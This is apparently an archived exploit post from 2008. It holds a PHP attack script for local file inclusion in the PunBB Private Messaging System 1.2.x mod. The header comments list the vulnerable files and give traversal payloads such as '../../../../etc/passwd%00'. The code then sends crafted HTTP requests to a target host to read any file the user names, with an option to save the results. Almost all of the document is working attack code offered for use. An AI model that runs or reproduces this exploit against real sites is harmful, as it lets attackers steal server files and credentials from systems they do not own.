punbb-lfi.txt
Posted on 19 November 2008
<?php error_reporting(0); ini_set("default_socket_timeout",5); /* PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit ----------------------------------------------------------- by athos - staker[at]hotmail[dot]it download mod http://www.punres.org/files.php?pid=52 download cms http://punbb.org ----------------------------------------------------------- register_globals = 1 magic_quotes_gpc = 1 Directory (files/include/pms) functions_navlinks.php?pun_user[language]=../../../../../etc/passwd profile_send.php?pun_user[language]=../../../../../etc/passwd viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd ../../etc/passwd and nullbyte File (files/include/pms/functions_navlinks.php) 1. <?php 2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['language'] isn't declared :D you can include any file functions_navlinks.php?pun_user[language]=../../../etc/passwd%00 ------------------------------------------------------------------- File (files/include/pms/header_new_messages.php) 1. <?php 2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){ 3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['g_pm'] isn't declared $pun_config['o_pms_enabled'] isn't declared header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00 ------------------------------------------------------------------- File (files/include/pms/profile_send.php)) 1. <?php 2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['language'] isn't declared profile_send.php?pun_user[language]=../../../../etc/passwd%00 ------------------------------------------------------------------- File (files/include/pms/viewtopic_PM-link.php) 1. <?php 2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['language'] isn't declared viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00 ------------------------------------------------------------------- Usage: php [punbb.php] [host/path] [mode] php [punbb.php] [host/path] [save] php [punbb.php] [host/path] [NULL] Example: php punbb.php localhost/punbb save php punbb.php localhost/punbb NOTE: Don't add me on MSN Messenger */ $exploit = new Exploit; $domain = $argv[1]; $mymode = $argv[2]; $exploit->starting(); $exploit->is_vulnerable($domain); $exploit->exploiting($domain,$mymode); class Exploit { function http_request($host,$data) { if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) { echo "socket_create() error! "; exit; } if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) { echo "socket_set_option() error! "; exit; } if(!socket_connect($socket,$host,80)) { echo "socket_connect() error! "; exit; } if(!socket_write($socket,$data,strlen($data))) { echo "socket_write() errror! "; exit; } while($get = socket_read($socket,1024,PHP_NORMAL_READ)) { $content .= $get; } socket_close($socket); $array = array( 'HTTP/1.1 404 Not Found', 'HTTP/1.1 300 Multiple Choices', 'HTTP/1.1 301 Moved Permanently', 'HTTP/1.1 302 Found', 'HTTP/1.1 304 Not Modified', 'HTTP/1.1 400 Bad Request', 'HTTP/1.1 401 Unauthorized', 'HTTP/1.1 402 Payment Required', 'HTTP/1.1 403 Forbidden', 'HTTP/1.1 405 Method Not Allowed', 'HTTP/1.1 406 Not Acceptable', 'HTTP/1.1 407 Proxy Authentication Required', 'HTTP/1.1 408 Request Timeout', 'HTTP/1.1 409 Conflict', 'HTTP/1.1 410 Gone', 'HTTP/1.1 411 Length Required', 'HTTP/1.1 412 Precondition Failed', 'HTTP/1.1 413 Request Entity Too Large', 'HTTP/1.1 414 Request-URI Too Long', 'HTTP/1.1 415 Unsupported Media Type', 'HTTP/1.1 416 Request Range Not Satisfiable', 'HTTP/1.1 417 Expectation Failed', 'HTTP/1.1 Retry With', ); for($i=0;$i<=count($array);$i++) if(eregi($array[$i],$content)) { return ("$array[$i] "); break; } else { return ("$content "); break; } } function is_vulnerable($host) { $host = explode('/',$host); $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1 "; $header .= "Host: $host[0] "; $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U) "; $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "; $header .= "Accept-Language: en-us,en;q=0.5 "; $header .= "Accept-Encoding: gzip,deflate "; $header .= "Connection: close "; if(stristr($this->http_request($host[0],$header),"\'")) { echo "[+] Magic Quotes GPC/Register Globals On! "; echo "[+] Exploit Failed! "; exit; } else { return false; } } function starting() { global $argv; if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) { echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit "; echo "[+] by athos - staker[at]hotmail[dot]it "; echo " ----------------------------------------------------------- "; echo "[+] Usage: php $argv[0] [host/path] [mode] "; echo "[+] Usage: php $argv[0] [host/path] [save] "; echo "[+] Usage: php $argv[0] [host/path] "; exit; } } function exploiting($host,$mode) { $host = explode('/',$host); $i = 0; echo "[+] Local File (ex: ../../etc/passwd%00) "; echo "[+] Local File: "; $file = stripslashes(trim(fgets(STDIN))); if(empty($file)) die("you fail"); $array = array ( "functions_navlinks.php?pun_user[language]=$file", "profile_send.php?pun_user[language]=$file", "viewtopic_PM-link.php?pun_user[language]=$file", "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file", ); $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1 "; $write .= "Host: $host[0] "; $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U) "; $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "; $write .= "Accept-Language: en-us,en;q=0.5 "; $write .= "Accept-Encoding: gzip,deflate "; $write .= "Connection: close "; if(stristr($this->http_request($host[0],$write),'No such file or directory in')) { $i++; } else { if($mode == "save") { $rand = rand(0,99999); fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); echo "[+] File $rand Saved Successfully! "; echo "[+] Exploit Terminated! "; exit; } else { echo $this->http_request($host[0],$write); exit; } } } }
